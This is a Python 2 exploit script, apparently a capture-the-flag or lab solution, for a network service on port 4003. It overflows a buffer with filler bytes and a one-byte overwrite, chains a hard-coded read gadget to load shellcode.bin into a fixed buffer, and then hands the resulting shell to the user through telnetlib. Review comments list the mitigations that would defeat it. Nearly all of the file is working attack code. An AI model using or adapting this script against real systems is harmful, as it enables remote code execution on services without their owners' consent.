import os
import random
import sys
import struct
import socket
import telnetlib
import time

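host = "10.13.37.35"
port = 4003

##########################################################################
# Exploit start
##########################################################################
#
# Python 2 script: the payload below concatenates str literals with
# struct.pack() output, which raises TypeError under Python 3.
#
# NOTE(review): every address used here is a hard-coded absolute value, so
# the script only works against a target whose code and data are mapped at
# fixed addresses. A payload followed by raw code from shellcode.bin also
# suggests the destination region is expected to be both writable and
# executable -- inferred from the script alone, confirm against the target.
# Position-independent builds with ASLR, non-executable data pages, stack
# protectors and a bounded read in the service would each break one of
# these assumptions.

# Connect to remote host
s = socket.socket()
s.connect((host, port))

# Manual pause before sending, left disabled by the author.
#raw_input("Go? ")

# Absolute addresses inside the target binary. Their roles are known only
# from the variable names; nothing in this script verifies them.
read_gadget = 0x8048581
write_gadget = 0x8048488  # defined but never used below
org_retaddr = 0x80485be   # defined but never used below

# Presumably the destination address and byte count handed to the read
# gadget -- TODO confirm against the target's calling sequence.
buf_addr = 0x804a040
big_count = 0x01ffffff

# First stage, in wire order. struct.pack('I', ...) uses the host's native
# byte order and int size (4 bytes, little-endian on x86).
payload = "".join([
    "A" * 128,                          # 128 filler bytes
    "\x8f",                             # single byte; what it overwrites is not shown here
    struct.pack('I', read_gadget),      # address of the read gadget
    "BBBB",                             # 4 placeholder bytes
    struct.pack('I', buf_addr),
    struct.pack('I', big_count),
    struct.pack('I', buf_addr) * 128,   # buf_addr repeated 128 times
    "\0",                               # trailing NUL
])
s.send(payload)

# Second stage: the raw contents of shellcode.bin, sent unmodified. The
# context manager closes the file handle, which the original left open.
with open("shellcode.bin", "rb") as f:
    s.send(f.read())

# Give control to user: bridge the connected socket to the local terminal.
t = telnetlib.Telnet()
t.sock = s
t.interact()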

